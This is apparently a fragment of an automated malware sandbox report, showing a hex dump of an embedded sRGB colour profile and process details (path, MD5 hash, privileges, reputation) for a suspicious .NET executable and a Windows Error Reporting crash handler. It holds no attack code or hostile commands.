6f 6e 20 69 6e 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20 43 6f 6e 64 69 74 69 6f 6e 20 69 6e 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 69 65 77 00
    Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view


    Target ID:0
    Start time:12:58:12
    Start date:19/05/2022
    Path:C:\Users\user\Desktop\P355uy6y7d.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\P355uy6y7d.exe"
    Imagebase:0xbc0000
    File size:2276808 bytes
    MD5 hash:36CF17949DE5C5B6352C9D43AE2B6171
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:low

    Target ID:6
    Start time:12:58:23
    Start date:19/05/2022
    Path:C:\Windows\System32\WerFault.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\WerFault.exe -u -p 6948 -s 1360
    Imagebase:0x7ff76a840000
    File size:494488 bytes
    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:high

    No disassembly